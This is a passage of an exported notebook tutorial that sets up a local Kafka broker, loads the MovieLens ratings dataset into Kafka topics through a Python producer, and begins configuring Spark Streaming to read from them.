fka_2.13-2.7.0/bin/../libs/jersey-server-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-client-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-continuation-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-http-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-io-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-security-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-server-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlet-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlets-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-util-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jopt-simple-5.0.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0-sources.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-clients-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-log4j-appender-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-raft-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-examples-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-scala_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-test-utils-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-tools-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/log4j-1.2.17.jar:/content/kafka_2.13-2.7.0/bin/../libs/lz4-java-1.7.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/maven-artifact-3.6.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/metrics-core-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-buffer-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-codec-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-handler-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-resolver-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-epoll-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-unix-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/osgi-resource-locator-1.0.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/paranamer-2.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/plexus-utils-3.2.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/reflections-0.9.12.jar:/content/kafka_2.13-2.7.0/bin/../libs/rocksdbjni-5.18.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-collection-compat_2.13-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-java8-compat_2.13-0.9.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-library-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-logging_2.13-3.9.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-reflect-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-api-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-log4j12-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/snappy-java-1.1.7.7.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-jute-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zstd-jni-1.4.5-6.jar org.apache.zookeeper.server.quorum.QuorumPeerMain ./kafka_2.13-2.7.0/config/zookeeper.properties root 1254 1 57 04:17 ? 00:00:05 /usr/lib/jvm/java-8-openjdk-amd64/bin/java -Xmx1G -Xms1G -server -XX:+UseG1GC -XX:MaxGCPauseMillis=20 -XX:InitiatingHeapOccupancyPercent=35 -XX:+ExplicitGCInvokesConcurrent -XX:MaxInlineLevel=15 -Djava.awt.headless=true -Xloggc:/content/kafka_2.13-2.7.0/bin/../logs/kafkaServer-gc.log -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCTimeStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=10 -XX:GCLogFileSize=100M -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Dkafka.logs.dir=/content/kafka_2.13-2.7.0/bin/../logs -Dlog4j.configuration=file:./kafka_2.13-2.7.0/bin/../config/log4j.properties -cp /content/kafka_2.13-2.7.0/bin/../libs/activation-1.1.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/aopalliance-repackaged-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/argparse4j-0.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/audience-annotations-0.5.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/commons-cli-1.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/commons-lang3-3.8.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-api-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-basic-auth-extension-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-file-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-json-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-mirror-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-mirror-client-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-runtime-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-transforms-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-api-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-locator-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-utils-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-annotations-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-core-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-databind-2.10.5.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-dataformat-csv-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-datatype-jdk8-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-jaxrs-base-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-jaxrs-json-provider-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-jaxb-annotations-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-paranamer-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-scala_2.13-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.activation-api-1.2.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.annotation-api-1.3.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.inject-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.validation-api-2.0.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.ws.rs-api-2.1.6.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.xml.bind-api-2.3.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/javassist-3.25.0-GA.jar:/content/kafka_2.13-2.7.0/bin/../libs/javassist-3.26.0-GA.jar:/content/kafka_2.13-2.7.0/bin/../libs/javax.servlet-api-3.1.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/javax.ws.rs-api-2.1.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jaxb-api-2.3.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-client-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-common-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-container-servlet-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-container-servlet-core-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-hk2-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-media-jaxb-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-server-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-client-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-continuation-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-http-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-io-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-security-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-server-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlet-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlets-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-util-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jopt-simple-5.0.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0-sources.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-clients-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-log4j-appender-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-raft-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-examples-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-scala_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-test-utils-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-tools-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/log4j-1.2.17.jar:/content/kafka_2.13-2.7.0/bin/../libs/lz4-java-1.7.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/maven-artifact-3.6.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/metrics-core-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-buffer-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-codec-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-handler-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-resolver-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-epoll-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-unix-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/osgi-resource-locator-1.0.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/paranamer-2.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/plexus-utils-3.2.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/reflections-0.9.12.jar:/content/kafka_2.13-2.7.0/bin/../libs/rocksdbjni-5.18.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-collection-compat_2.13-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-java8-compat_2.13-0.9.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-library-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-logging_2.13-3.9.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-reflect-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-api-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-log4j12-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/snappy-java-1.1.7.7.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-jute-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zstd-jni-1.4.5-6.jar kafka.Kafka ./kafka_2.13-2.7.0/config/server.properties root 1329 359 0 04:18 ? 00:00:00 /bin/bash -c ps -ef | grep kafka root 1331 1329 0 04:18 ? 00:00:00 grep kafka ###Markdown Create the kafka topics with the following specs:- susy-train: partitions=1, replication-factor=1 - susy-test: partitions=2, replication-factor=1 ###Code !./kafka_2.13-2.7.0/bin/kafka-topics.sh --create --bootstrap-server 127.0.0.1:9092 --replication-factor 1 --partitions 1 --topic reco-train !./kafka_2.13-2.7.0/bin/kafka-topics.sh --create --bootstrap-server 127.0.0.1:9092 --replication-factor 1 --partitions 2 --topic reco-test ###Output Created topic reco-train. Created topic reco-test. ###Markdown Describe the topic for details on the configuration ###Code !./kafka_2.13-2.7.0/bin/kafka-topics.sh --describe --bootstrap-server 127.0.0.1:9092 --topic reco-train !./kafka_2.13-2.7.0/bin/kafka-topics.sh --describe --bootstrap-server 127.0.0.1:9092 --topic reco-test ###Output Topic: reco-train PartitionCount: 1 ReplicationFactor: 1 Configs: segment.bytes=1073741824 Topic: reco-train Partition: 0 Leader: 0 Replicas: 0 Isr: 0 Topic: reco-test PartitionCount: 2 ReplicationFactor: 1 Configs: segment.bytes=1073741824 Topic: reco-test Partition: 0 Leader: 0 Replicas: 0 Isr: 0 Topic: reco-test Partition: 1 Leader: 0 Replicas: 0 Isr: 0 ###Markdown The replication factor 1 indicates that the data is not being replicated. This is due to the presence of a single broker in our kafka setup.In production systems, the number of bootstrap servers can be in the range of 100's of nodes. That is where the fault-tolerance using replication comes into picture.Please refer to the [docs](https://kafka.apache.org/documentation/replication) for more details. Movielens DatasetKafka being an event streaming platform, enables data from various sources to be written into it. For instance:- Web traffic logs- Astronomical measurements- IoT sensor data- Product reviews and many more.For the purpose of this tutorial, lets download the [Movielens](https://github.com/sparsh-ai/reco-data/blob/master/MovieLens_100K_ratings.csv?raw=true) dataset and feed the data into kafka manually. ###Code !wget -O ml_ratings.csv https://github.com/sparsh-ai/reco-data/blob/master/MovieLens_100K_ratings.csv?raw=true ###Output --2021-06-25 04:18:18-- https://github.com/sparsh-ai/reco-data/blob/master/MovieLens_100K_ratings.csv?raw=true Resolving github.com (github.com)... 192.30.255.112 Connecting to github.com (github.com)|192.30.255.112|:443... connected. HTTP request sent, awaiting response... 302 Found Location: https://github.com/sparsh-ai/reco-data/raw/master/MovieLens_100K_ratings.csv [following] --2021-06-25 04:18:19-- https://github.com/sparsh-ai/reco-data/raw/master/MovieLens_100K_ratings.csv Reusing existing connection to github.com:443. HTTP request sent, awaiting response... 302 Found Location: https://raw.githubusercontent.com/sparsh-ai/reco-data/master/MovieLens_100K_ratings.csv [following] --2021-06-25 04:18:19-- https://raw.githubusercontent.com/sparsh-ai/reco-data/master/MovieLens_100K_ratings.csv Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ... Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 2179205 (2.1M) [text/plain] Saving to: ‘ml_ratings.csv’ ml_ratings.csv 100%[===================>] 2.08M --.-KB/s in 0.1s 2021-06-25 04:18:20 (20.4 MB/s) - ‘ml_ratings.csv’ saved [2179205/2179205] ###Markdown Explore the dataset ###Code movielens_df = pd.read_csv('ml_ratings.csv') movielens_df.head() # Number of datapoints and columns len(movielens_df), len(movielens_df.columns) ###Output _____no_output_____ ###Markdown Split the dataset ###Code train_df, test_df = train_test_split(movielens_df, test_size=0.4, shuffle=True) print("Number of training samples: ",len(train_df)) print("Number of testing sample: ",len(test_df)) x_train_df = train_df.drop(["Rating"], axis=1) y_train_df = train_df["Rating"] x_test_df = test_df.drop(["Rating"], axis=1) y_test_df = test_df["Rating"] # The labels are set as the kafka message keys so as to store data # in multiple-partitions. Thus, enabling efficient data retrieval # using the consumer groups. x_train = list(filter(None, x_train_df.to_csv(index=False).split("\n")[1:])) y_train = list(filter(None, y_train_df.to_csv(index=False).split("\n")[1:])) x_test = list(filter(None, x_test_df.to_csv(index=False).split("\n")[1:])) y_test = list(filter(None, y_test_df.to_csv(index=False).split("\n")[1:])) NUM_COLUMNS = len(x_train_df.columns) len(x_train), len(y_train), len(x_test), len(y_test) ###Output _____no_output_____ ###Markdown Store the train and test data in kafkaStoring the data in kafka simulates an environment for continuous remote data retrieval for training and inference purposes. ###Code def error_callback(exc): raise Exception('Error while sendig data to kafka: {0}'.format(str(exc))) def write_to_kafka(topic_name, items): count=0 producer = KafkaProducer(bootstrap_servers=['127.0.0.1:9092']) for message, key in items: producer.send(topic_name, key=key.encode('utf-8'), value=message.encode('utf-8')).add_errback(error_callback) count+=1 producer.flush() print("Wrote {0} messages into topic: {1}".format(count, topic_name)) write_to_kafka("reco-train", zip(x_train, y_train)) write_to_kafka("reco-test", zip(x_test, y_test)) # ! /content/kafka_2.13-2.7.0/bin/kafka-console-consumer.sh \ # --bootstrap-server localhost:9092 \ # --topic reco-train \ # --from-beginning ###Output Processed a total of 60000 messages ###Markdown Spark Streaming ###Code !apt-get install openjdk-8-jdk-headless -qq > /dev/null !wget https://downloads.apache.org/spark/spark-2.4.8/spark-2.4.8-bin-hadoop2.7.tgz !tar -xvf spark-2.4.8-bin-hadoop2.7.tgz !pip install findspark !wget "https://repo1.maven.org/maven2/org/apache/spark/spark-streaming-kafka-0-8-assembly_2.11/2.4.8/spark-streaming-kafka-0-8-assembly_2.11-2.4.8.jar" import os os.environ["JAVA_HOME"] = "/usr/lib/jvm/java-8-openjdk-amd64" os.environ["SPARK_HOME"] = "/content/spark-2.4.8-bin-hadoop2.7" os.environ['PYSPARK_SUBMIT_ARGS'] = '--jars /content/spark-streaming-kafka-0-8-assembly_2.11-2.4.8.jar pyspark-shell' import findspark findspark.init() from pyspark.sql import SparkSession from pyspark.sql.functions import * from pyspark.ml.feature import Normalizer, StandardScaler import random import pyspark import sys from pyspark import SparkContext, SparkConf from pyspark.streaming import StreamingContext from pyspark.streaming.kafka import KafkaUtils from uuid import uuid1 import time kafka_topic_name = "reco-train" kafka_bootstrap_servers = 'localhost:9092' ###Output _____no_output_____ ###Markdown ![image.png](data:image/png;base64,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